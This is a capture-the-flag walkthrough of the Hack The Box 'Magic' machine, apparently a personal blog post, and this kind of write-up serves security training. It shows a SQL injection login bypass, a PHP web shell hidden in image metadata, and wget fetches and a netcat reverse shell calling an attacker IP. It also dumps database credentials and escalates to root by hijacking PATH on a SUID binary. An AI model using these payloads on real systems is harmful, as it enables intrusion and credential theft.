Hackthebox Magic writeup

Hackthebox Magic writeup
3.7
(6)
Hackthebox Magic writeup

Introduction

It is a medium machine from the hack the box platform.Which has simple authentication bypass to upload a malicious file and then jumping a user followed by privilege escalation using SUID

Steps involved

1-Port Scan
2-Visiting website
3-Authentication bypass
4-Encoding php inside image
5-Uploading malicious file and bypassing security check
6-Uploading php reverse shell
7-Getting full shell
8-Getting db user creds
9-Jumping User(user flag)
10-Analysing SUID
11-Exploiting SUID (sysinfo) via path variable
12-Getting root flag

Commands involved

1-nmap -sC -sV -v -oV 10.10.10.185
2-exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' rana.jpg
3-mv rana.jpg rana.php,jpg
4-python -m SimpleHTTPServer
5-python3 -c 'import pty; pty.spawn("/bin/sh")'
6-bash -i
7-cat db.php5
8-mysqldump -utheseus -piamkingtheseus Magic
9-su theseus
10-find / -perm -u=s -type f 2>/dev/null
11-wget http://10.10.14.20:8000/pspy64
12-echo "/bin/bash" > lshw
13-chmod 777 lshw
14-export PATH=/tmp:$PATH
15-/bin/sysinfo
16-/tmp/nc -e /bin/bash 10.10.14.20 2345

Port scan

Nmap 7.70 scan initiated Tue Apr 21 13:31:27 2020 as: nmap -sC -sV -v -oV 10.10.10.185
Increasing send delay for 10.10.10.185 from 0 to 5 due to 61 out of 203 dropped probes since last increase.
Increasing send delay for 10.10.10.185 from 5 to 10 due to 217 out of 723 dropped probes since last increase.
Nmap scan report for 10.10.10.185
Host is up (0.52s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Apr 21 13:32:33 2020 -- 1 IP address (1 host up) scanned in 66.55 seconds

Visiting website

The first thing I do is check the website.

So let’s visit it.

Hackthebox Magic writeup

It says Login to upload images.

That looks great that we can upload something so let’s try to login.

Authentication bypass

Hackthebox Magic writeup

I used simple sqli to bypass the authentication check.

Username='-'
password='-'

And this allowed me to bypass the authentication check.

Hackthebox Magic writeup

I tried to upload a .php file but it didn’t allowed.

Hackthebox Magic writeup

Encoding php inside image

So now let’s encode the .php file inside the image file.I used exiftool for this purpose.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' rana.jpg 

And then just renamed it to rana.php.jpg .So that it can be executed as a php file.

mv rana.jpg rana.php,jpg

So let’s try to upload it.

Hackthebox Magic writeup

And it was successfully uploaded.

Uploading malicious file and bypassing security check

But in order to access it we need to know the path of it first.

So for this I uploaded simple image.

And it came on the home page of the website.

Hackthebox Magic writeup

So when i viewed it it gave me the path where it was uploaded.

http://10.10.10.185/images/uploads/pic.jpg
Hackthebox Magic writeup

So let’s see weather the file is working or not.

Hackthebox Magic writeup

Uploading php reverse shell

So it was working fine so i uploaded a full php reverse shell through this.

The php shell i used was.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

First let’s set up python server.

python -m SimpleHTTPServer
Hackthebox Magic writeup

So let’s upload it using our malicious image file.You should do it fast as the image get’s automatically deleted after some time.

http://10.10.10.185/images/uploads/rana.php.jpg?cmd=wget http://10.10.14.20:8000/rev.php
Hackthebox Magic writeup

Getting full shell

For accessing it i simply visited that.

But don’t forget to start up the nc listener for getting the shell back .

And here i also got a shell back as www-data.

Hackthebox Magic writeup

I used spawwing pty python shell to get the full control on the shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'
bash -i

Getting db user creds

After some enumeration i got a db.php5 file.

Hackthebox Magic writeup
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null; public function __construct() { die('Init function is not allowed'); } public static function connect() { // One connection through whole application if ( null == self::$cont ) { try { self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword); } catch(PDOException $e) { die($e->getMessage()); } } return self::$cont; } public static function disconnect() { self::$cont = null; }
}

Jumping User

It contains db user creds so let’s use these to get the creds of the user .

I used sqldump for this purpose.

mysqldump -utheseus -piamkingtheseus Magic 
Hackthebox Magic writeup

And got another creds.

admin:Th3s3usW4sK1ng

We had db password for user theseus and the user was on the machine also .So I tried to used these creds for jumping to theseus user.And got the user flag.

[email protected]:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng
[email protected]:/var/www/Magic$ whoami
whoami
theseus
[email protected]:/var/www/Magic$ cd /home/theseus
cd /home/theseus
[email protected]:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
[email protected]:~$ cat user.txt
cat user.txt
c3*****************************21b
[email protected]:~$

Analysing SUID

So now it’s time for privilege escalation .

Let’s see the SUID first.

[email protected]:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

The which looks odd is /bin/sysinfo.

Exploiting SUID (sysinfo) via path variable

Let’s see what happens when we run it .

So i decided to have two shell and run pspy in one and in another i will run the /bin/sysinfo suid.

wget http://10.10.14.20:8000/pspy64

When i ran sysinfo and saw it on pspy on another shell i found something special.

Hackthebox Magic writeup

This shows that these cmds are running as root when we run sysinfo SUID.

So let’s exploit it.

First let’s upload nc in the /tmp .

wget http://10.10.14.20:8000/nc

I used lshw for the exploitaion.

[email protected]:/tmp$ echo "/bin/bash" > lshw
[email protected]:/tmp$ chmod 777 lshw

And now let’s edit the path variable.

export PATH=/tmp:$PATH

And now simply running sysinfo can give us root.

Hackthebox Magic writeup

Getting root flag

This shell was not full and i was not able to get the root flag so i started a reverse shell through nc

[email protected]:/tmp# /tmp/nc -e /bin/bash 10.10.14.20 2345
Hackthebox Magic writeup

And now we have full shell so we can read the root flag.

ls            
lshw
nc
ps
pspy64
cd /root
cat root.txt
7b##################################f

Thanks for reading the writeup .If you liked it then please support me .

How useful was this post?

Click on a star to rate it!

Average rating 3.7 / 5. Vote count: 6

No votes so far! Be the first to rate this post.

As you found this post useful…

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Reply

Your email address will not be published. Required fields are marked *

wpChatIcon
0 Shares
Tweet
Share
Share
Pin